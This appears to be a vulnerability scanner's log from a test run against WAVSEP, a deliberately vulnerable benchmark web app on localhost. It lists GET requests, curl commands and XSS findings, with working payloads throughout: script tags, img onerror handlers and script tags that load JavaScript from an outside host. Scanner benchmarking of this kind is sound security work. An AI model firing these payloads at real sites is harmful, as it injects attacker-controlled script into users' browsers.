GET /wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case04-InjectionInToVariableBeingAssignedToDomXssSinkLocation.jsp?userinput=String.fromCharCode%280%2Cwy7vu1gkj0%2C1%29 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/DOM-XSS/DXSS-Detection-Evaluation-GET-Experimental/Case04-InjectionInToVariableBeingAssignedToDomXssSinkLocation.jsp?userinput=String.fromCharCode%280%2Cwy7vu1gkj0%2C1%29"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wqesv82y26%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wqesv82y26%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwyhrsztnnfz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwyhrsztnnfz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w426asjkng%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w426asjkng%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8t91tmgznz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8t91tmgznz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wn0ihpltbj%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wn0ihpltbj%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wc90hw0m4n%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wc90hw0m4n%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wm7bkzh9wz%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wm7bkzh9wz%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wojuj3j3xj%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wojuj3j3xj%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w8lj92yfdt%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w8lj92yfdt%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wlj3zm2q7n%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wlj3zm2q7n%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wsjrho63lt%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case21-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wsjrho63lt%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wz099uakvj%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wz099uakvj%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wk2ylesf6g%22%29%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wk2ylesf6g%22%29%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wp8vs8lst2%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wp8vs8lst2%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wdwf430wru%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wdwf430wru%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wt48do4mqa%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wt48do4mqa%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wmx3266v29%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wmx3266v29%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w5hji3lhcf%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w5hji3lhcf%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wgd1jnelb9%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wgd1jnelb9%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w9t56rqk0s%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27w9t56rqk0s%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wv7lohpdkw%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wv7lohpdkw%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27whpbkq4g9f%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27whpbkq4g9f%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wvd2xjen11%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wvd2xjen11%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27we7j17y4ry%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27we7j17y4ry%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wwyeyqtgge%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wwyeyqtgge%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrk2lhmwp7z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case01-LFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrk2lhmwp7z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wh5a28w49a%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%3Ealert%28%27wh5a28w49a%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwiw32q3xwpz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwiw32q3xwpz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqkoq45c1jz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwqkoq45c1jz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjaf8zhf96z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjaf8zhf96z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=%3Cscript%3Ealert%28%27ww2ojcqu6w%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=%3Cscript%3Ealert%28%27ww2ojcqu6w%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=%3Cscript%3Ealert%28%27wnliy3iu8p%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=%3Cscript%3Ealert%28%27wnliy3iu8p%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=%3Cscript%3Ealert%28%27wlenp4tc97%27%29%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=%3Cscript%3Ealert%28%27wlenp4tc97%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-FalsePositives-GET/Case01-RFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcjryynj11z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case01-RFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcjryynj11z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
GET /wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjqjs5luc2z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjqjs5luc2z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp?userinput=%3Cimg%20src%3D.%20onerror%3Dalert%28%22ws12rzjbr5%22%29%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp?userinput=%3Cimg%20src%3D.%20onerror%3Dalert%28%22ws12rzjbr5%22%29%3E"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case07-ScriptlessInjectionInScriptTagSrcAttribute.jsp?userinput=%22%3E%3C%2Fscript%3E%3Cscript%20src%3D%2F%2Fwapiti3.ovh%2Fw3ibcqq7j3z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case07-ScriptlessInjectionInScriptTagSrcAttribute.jsp?userinput=%22%3E%3C%2Fscript%3E%3Cscript%20src%3D%2F%2Fwapiti3.ovh%2Fw3ibcqq7j3z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp?userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwkejj2sebgz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp?userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwkejj2sebgz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case02-Tag2TagScope.jsp?userinput=%3C%2Ftextarea%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxwvqiddc3z.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case02-Tag2TagScope.jsp?userinput=%3C%2Ftextarea%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxwvqiddc3z.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case03-Tag2TagStructure.jsp?userinput=%22%2F%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxeknck0dwz.js%3E%3C%2Fscript%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case03-Tag2TagStructure.jsp?userinput=%22%2F%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwxeknck0dwz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case05-Tag2Frameset.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwxbv2o8vnt%2C1%29%3B HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case05-Tag2Frameset.jsp?userinput=javascript%3AString.fromCharCode%280%2Cwxbv2o8vnt%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case06-Event2TagScope.jsp?userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wjvityvovc%22%29%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case06-Event2TagScope.jsp?userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wjvityvovc%22%29%3E"
XSS vulnerability found via injection in the parameter userinput
GET /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case07-Event2DoubleQuotePropertyScope.jsp?userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wugxqpxulj%22%29%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case07-Event2DoubleQuotePropertyScope.jsp?userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wugxqpxulj%22%29%3E"
XSS vulnerability found via injection in the parameter userinput
